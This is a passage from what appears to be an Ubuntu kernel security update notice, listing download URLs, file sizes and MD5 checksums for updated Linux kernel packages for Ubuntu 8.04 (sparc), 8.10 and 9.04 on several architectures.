http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   263030 82e8bd5f9f922af935f6f787942f4b2f
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:  1386520 98436d21f7255a6c923b50900bd2de4d
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   175444 37239b1899dd449d5b4985163c46d678
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   122106 1b86f75278b7fab22bbffd2c0010eef5
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    40398 81325db98acd64573c100455f0cb5289
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    48060 dd1b8744fcecf5959d2dac4a23b8cd34
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:     8698 a2a5a2941546e0137d8c57a38ba9ab2f
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    60516 08d388a60ac9be5c7d80d479f94fd4aa
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   106838 b350cddddb73537859dce8203c49ac1d
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:  1002034 0756e59f467bdefbc26dcb06a6201457
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:     9518 7bf2df83ac5364fef90bf13ea616e7e3
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   391514 9e98f9f4757387d261d6c7a1e8c7d61d
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    75924 b375f2838ce3f024a9f2b58d02f9d98e

Updated packages for Ubuntu 8.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.diff.gz
  Size/MD5:  3279295 99a1653c9f3eb96475ee9776faff3701
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.dsc
  Size/MD5:     2761 3b7c2f9d1b970a69db9a1c2c2bd5d95c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz
  Size/MD5: 63721466 482b04f680ce6676114ccfaaf8f66a55

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.45_all.deb
  Size/MD5:  3492310 1dbaf1873425d41dfce3b359fc95728e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.45_all.deb
  Size/MD5:  5906568 e4cb3deaf39ad7c3917d33f0f1082a40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.45_all.deb
  Size/MD5: 52050112 2852d57c251b525e97d6ba66a94f1be5

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    36530 ae958becd299698d5f30f722eb07cde7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   265218 1de0174009daaf9e0d3fb8f8e737fa40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    53438 46087922e5b4128b6a5f52dcacfbf840
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    43030 e25c2b8fbd4f46654a1ebc6089ef31bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    52344 4c16a22c0fe8f2a967f1503953ed5f8c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    89844 4cc23c275cc1fd6621ac977881b91345
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    38180 24f5566a9c89334d394fb48d7c3d4949
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   677070 84220f4d0562b59edd2f0865120d4494
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   158618 edbaf560c5847b8f520ad94cd3f8d2d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    46346 90f299bb91f23a67e0811ae8e0472e70
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   154240 3ccfee605d2ef5a5e87aeb71320b337b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   313106 896f96e4eb01ff9381aaa78b6e1dc72d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:  2604320 b50756ed8aeeee4a72873b8c60df10b6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_amd64.deb
  Size/MD5:   663304 ef966b97630e8096fcf279d6c43b3960
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_amd64.deb
  Size/MD5:   662184 599a4bf3bad78733d35ad1b4a5601a25
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_amd64.deb
  Size/MD5: 23073032 96da11b5c1a75a1694b4047c1a71b091
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_amd64.deb
  Size/MD5: 23071096 162a682066d9c7d90df92c975698b2cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_amd64.deb
  Size/MD5: 10479836 39042ef6e7f9049837b4d137450dc41a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_amd64.deb
  Size/MD5:   675844 3d711e518906ef37120bccabeaa1da2d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   434926 cc27207ed63847b17eab47e1978c98fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   186500 940e6b351f4975369720543184596a04
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   275594 b525586af57630fd8b4e098cef404ad9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:  1810688 13f3abe5b38ff8a704c985dc8f3275b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   151324 d883249df4fb86d6d9d1146db5fa1020
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   194282 ee6a6162a8b0615e73a89978fcb9d172
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   168150 696ed64f02936c7200cc9a468302de40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    36428 ff94b9ab68b2108fd9d1d2475c211725
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    83436 3dceac801e8b0405790e1a28c960183f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    71992 2b936af85a4eceb6312ad7ef93a18c88
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    23240 1d34a195f16d39f7895a2bf36281a6c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:     9012 454b1c03d70fbf4a917ff2431b6b4f2b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    68544 cd2e39978716c3448e54d6862877957c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   110302 ecb1005946c139f2340aaee3e80cd152
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:  1276186 d93285c15892be57cfb76798c746f88d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    47602 d2039335dc8bb4104fbb473b5ada0d96
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    13480 5299f432e2db456a3e0743fd786c18f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   393936 83cfaf207498b9a60d4e97cd21309095
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   200806 5dfbdf4ce61cbe469582c94509160a42
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    13614 c860448fa643364e8776a4947cff9714

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    33948 74da15b4b68dc6a03f2da65175b021bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   244732 aee21df42a017731c52c53100cbf2f20
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    55398 f4d1c18a70aec1e3e39572c36318115c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    41206 42a8188a1ad868fa58aa779b31908d65
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    48698 7e06c0fbdb39f426e1259d35e8f1505e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    86942 49099dad48131ce191b10c154f096d6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    34064 c8cf2cb88451687abb047df2faae44f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   675492 3e953f324652ef7a01f93aeaa2dc5e55
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   158402 aa593e2736e7b717ea8c561b1e11c27b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    43624 b2ca8774a7cf447123ea811781e80dbf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   145226 0fbb95dc0bc59baf91447250f19e7d45
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   302390 991c8e4ef2dda71d6deda5599129a768
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:  2436572 4b845d0a28c2b48ad0c29521bae3a0b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_i386.deb
  Size/MD5:   645046 28f8ea5f653057c350d40feb64d68f2d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_i386.deb
  Size/MD5:   645340 a4d347f729beffbf9ff1701d21a5f9b2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_i386.deb
  Size/MD5: 23499764 59f3275c547e9f13f97eba55955725f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_i386.deb
  Size/MD5: 23635906 c096ba5db0db8b87f67309a9e9c6ff5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_i386.deb
  Size/MD5: 10117090 7e1648c7b3a3ab2606263ecb20683ba1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_i386.deb
  Size/MD5:   675850 3e91710602fec2d4aebafe62a6cdfe80
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   433078 d1439530f50069f41b4c30b010871b4f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   171298 68b786d8853574467c792efe3fa62ca5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   264104 3a49c641e4a146fdb634b298c51ca6e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:  1994518 105c6b0fb8b650949da502f3fee2018d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   150964 dc4178cced6d9c1823d24b2204c15ae9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   184058 a25940b16b7022a52f7b8c78e164a908
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   157856 c628cef1c909819dab1fe2d812dffeba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    34500 2ea55d8e77aa3065af30ff4d440c059d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    78286 6d0f7704cdff848dbbfbd5fe60cf0ca7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    86190 c7d8ec25c3d35ea8455e9cf7c1b4ec64
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    51332 79b56b5e7f79a17d45fb7c55f64954b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:     8796 e571105caa3bed5fc3576928b03eff31
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    64316 bcb0f12340567e9db7a5dcc3549dcf0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   102092 a2556a5171c52abe48ba423b008c6f13
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:  1450234 339572f5e579468fc438b1dd2cc2dcd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    44520 68267a8c684d01c673d4b41bf5d4af69
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    12642 80e228567fcb814cd67e54aec6abdb41
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   373158 483599df2e1b6c82a688b413b74e5b91
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   189720 156d822da222b7fc8b887a4d1b3b7c31
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    12992 7232aad22eb02ec694fa0d41d367a69c

Updated packages for Ubuntu 9.04:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.diff.gz
  Size/MD5:  7350773 c09bf21927b9609694b39cdd55af21cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.dsc
  Size/MD5:     3198 5ba9f01bd70b951901d1d1667b964b54
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz
  Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.59_all.deb
  Size/MD5:  3636694 05fda32db7067b32c0fe593e1acf0533
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.59_all.deb
  Size/MD5:  8701396 65f8df38ba832ad50c6486d22420efca
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.59_all.deb
  Size/MD5: 56998214 3d33148ef29824c1060e1f66b470c6c4

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   234600 929bceffa24f85104c08edf073ac1f0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    44110 6d94c9d8ecfe3b4673d25cce1db2b95b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    43316 d895b0ad91a70c9381fd7e17650fab75
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    51116 da4c61dc01f5b5e8fb61cdf14bbbb40a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    90082 dad217572b5b07064b9e12b0062d16b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    38016 5e886058b306b4937f5a4ebe22451db6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   521628 d9f3ffe45b307847935002619ac31ea0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   125818 6fbc3c76a739b91e01da41bd535f3791
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    58060 cc30f23edae38f46b0d56f621969fd62
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   312502 9a11c9f0f37fee6a92c59de9df5fca11
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:  3872142 cdc4640244b192a5970dfc3d3efe4d7e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_amd64.deb
  Size/MD5:   689228 bf7aedb2bbb365a73ed77a8976a2701e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_amd64.deb
  Size/MD5:   689122 80cfc63043a2d7231f86ef3e68f0a131
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_amd64.deb
  Size/MD5: 24344078 dca923a8044df0ba9c642d5f2b317867
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_amd64.deb
  Size/MD5: 24335914 ad5a4fe70b4555e9399f9a45b58459f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_amd64.deb
  Size/MD5: 10551276 b61ed90bb3d3f19f0d2e593c0e9f091a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_amd64.deb
  Size/MD5:   766282 f86ee0c95591ea10b578e848b6fdeb5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   215170 7939440a8813110d952d86b49113e146
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   189496 f7495840a58b11f4ebfaad4d8cf203fe
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    29412 54845dbae313e98befcc172b5e87ac2c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   274480 e029f99b6550bd014f26c45997f76dcc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:  1933908 6fa450fb440effd7f4a1d643f5e80ab9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   163464 208a84b0506fcd9cadb25f1b7f9d26b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   194828 596399bbfa9a92e3116c8f8d3a7d1391
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   152994 3cf4fb6614c5798cdcca7c8d7fd04a5b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    36486 b3cf4deb0dc4e11f095eb9bcf81546df
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:     5842 085134ad282a8b2580aa12a6ed64fd9e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    72152 5b6bf270db5279c7d79cbd5fca8e14f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    22714 a01ded50b855c5ed0580072a2277b74a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:     8874 f173072403f51e6e6da399debd91068f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    47442 e822623d7e4ae0bec0ea5094fed67dcf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    15656 2b2e6ad08af592fa3106adb4eb16324e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:  1273594 d873a895c58da3fcd5b8a0ea91f9a5ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    47204 c80f48bd49fddaae0188cf56350445f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    72706 dcc76877eef3af00d0280f96cafb6e45
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   126958 b184498c9d2a598d57e293bc09049cda
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    13472 1399e0100a81d92448659b83949a62a6

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   215860 fe00a3406a5496e200d5c4e5975469f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    46662 d7a61d1e363f9766795132d3325f02c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    41352 7d84e783cf7fc4111eaf964395440369
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    47402 2cd024da2955f7e35fe4519c8df5add5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    86924 515a3a07357e06f49b2e4384e2af7b8c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    33578 452adbbc84f5a5218610ddad25eb3ea0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   525752 1a2c59458472f4a18538df9386396703
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   125654 8678d7c3409daf24a373b4d11a0d9263
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    54874 94d4465b06d14b20af5803f2afddf53d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   301338 64a58b9a7ee5d53c2d1a486fe32deb93
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:  3746292 099947b9ddfb625da14b96bf1b9f59e6
